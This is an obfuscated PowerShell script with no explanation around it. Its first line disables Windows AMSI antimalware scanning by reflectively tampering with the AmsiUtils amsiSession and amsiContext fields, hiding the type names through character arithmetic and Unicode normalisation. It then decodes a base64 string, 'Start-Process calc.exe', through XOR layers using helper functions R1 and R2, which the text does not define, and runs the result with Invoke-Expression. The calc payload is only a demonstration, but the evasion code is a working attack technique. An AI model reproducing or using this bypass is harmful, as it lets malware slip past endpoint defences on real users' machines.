$Vx5itjzOajT=$null;$OeQdln0ZJ9L=[System.Runtime.InteropServices.Marshal]::AllocHGlobal((9076+1759-1759));$biimxdpoaaxqqevhyakpj="+[cHAR]([BYTE]0x69)+[chAR](116*33/33)+[CHar]([BYTe]0x71)+[cHaR]([bYte]0x75)";[Threading.Thread]::Sleep(881);[Ref].Assembly.GetType("System.$([CHAr]([byTE]0x4d)+[CHar]([BYte]0x61)+[char]([ByTE]0x6e)+[CHAR](64+33)+[cHAR]([Byte]0x67)+[ChAr](36+65)+[Char]([BYTE]0x6d)+[CHar]([BYte]0x65)+[cHar](110*62/62)+[CHar](116*84/84)).$(('Äût'+'ômà'+'tíô'+'n').NoRmalIze([cHar](70)+[CHar](111)+[Char](114+97-97)+[CHAr](109*54/54)+[CHaR]([bYTe]0x44)) -replace [ChaR]([bYtE]0x5c)+[cHAr](112+2-2)+[ChAR]([bYte]0x7b)+[char]([BytE]0x4d)+[CHaR](110*24/24)+[chAr]([bYTe]0x7d)).$(('Âmsí'+'Útìl'+'s').NORmalIZe([Char]([bYTe]0x46)+[Char]([bYtE]0x6f)+[Char]([Byte]0x72)+[cHAr](109+24-24)+[cHAR]([ByTe]0x44)) -replace [ChAR](92)+[CHAr]([bYTE]0x70)+[chAr]([byTe]0x7b)+[cHAr](77*33/33)+[CHAR]([BYTE]0x6e)+[CHAr]([Byte]0x7d))").GetField("$([cHAr](54+43)+[cHar](109*25/25)+[cHaR](65+50)+[Char](99+6)+[cHAr]([ByTE]0x53)+[Char]([BYTE]0x65)+[chaR]([byTE]0x73)+[CHAr](115)+[cHAR](105*38/38)+[ChAr]([bYte]0x6f)+[cHar]([bYTe]0x6e))", "NonPublic,Static").SetValue($Vx5itjzOajT, $Vx5itjzOajT);[Ref].Assembly.GetType("System.$([CHAr]([byTE]0x4d)+[CHar]([BYte]0x61)+[char]([ByTE]0x6e)+[CHAR](64+33)+[cHAR]([Byte]0x67)+[ChAr](36+65)+[Char]([BYTE]0x6d)+[CHar]([BYte]0x65)+[cHar](110*62/62)+[CHar](116*84/84)).$(('Äût'+'ômà'+'tíô'+'n').NoRmalIze([cHar](70)+[CHar](111)+[Char](114+97-97)+[CHAr](109*54/54)+[CHaR]([bYTe]0x44)) -replace [ChaR]([bYtE]0x5c)+[cHAr](112+2-2)+[ChAR]([bYte]0x7b)+[char]([BytE]0x4d)+[CHaR](110*24/24)+[chAr]([bYTe]0x7d)).$(('Âmsí'+'Útìl'+'s').NORmalIZe([Char]([bYTe]0x46)+[Char]([bYtE]0x6f)+[Char]([Byte]0x72)+[cHAr](109+24-24)+[cHAR]([ByTe]0x44)) -replace [ChAR](92)+[CHAr]([bYTE]0x70)+[chAr]([byTe]0x7b)+[cHAr](77*33/33)+[CHAR]([BYTE]0x6e)+[CHAr]([Byte]0x7d))").GetField("$(('ämsîCónté'+'xt').nORMaliZE([CHAr](70)+[chAR]([BYTe]0x6f)+[cHAR]([bYTE]0x72)+[CHaR](109+30-30)+[ChAr]([bYte]0x44)) -replace [ChAr](92)+[char](112+78-78)+[ChAR]([byTE]0x7b)+[chaR]([BYTE]0x4d)+[cHar](110+86-86)+[cHar](125*99/99))", "NonPublic,Static").SetValue($Vx5itjzOajT, [IntPtr]$OeQdln0ZJ9L);$gol="+[CHAr](106+4)+[cHaR](118*4/4)+[ChaR](114+94-94)+[Char]([byte]0x74)+[CHaR]([bYte]0x79)+[CHaR](103)+[CHAR](109+9-9)";[Threading.Thread]::Sleep(630)
$zutat = "U3RhcnQtUHJvY2VzcyBjYWxjLmV4ZQ=="

$s1 = $zutat.Substring(0, 4)
$s2 = $zutat.Substring(4, 5)
$s3 = $zutat.Substring(9, 4)
$s4 = $zutat.Substring(13, 6)
$s5 = $zutat.Substring(19, 3)
$s6 = $zutat.Substring(22, 5)
$s7 = $zutat.Substring(27)

$gekocht = $s1 + $s2 + $s3 + $s4 + $s5 + $s6 + $s7

$b = [Text.Encoding]::UTF8.GetBytes($gekocht)
$c = [string][math]::Round([math]::Pow((R1),10))
$d = [Text.Encoding]::UTF8.GetBytes($c)
$e = $d[($d.Length-1)..0]

$f1 = R2 -x $b -y $d
$f2 = R2 -x $f1 -y $e
$g = [Text.Encoding]::UTF8.GetString($f2)

$h = R2 -x ([Text.Encoding]::UTF8.GetBytes($g)) -y $e
$i = R2 -x $h -y $d
$j = [Text.Encoding]::UTF8.GetString($i)
$k = [Convert]::FromBase64String($j)
$l = [Text.Encoding]::UTF8.GetString($k)

Invoke-Expression $l
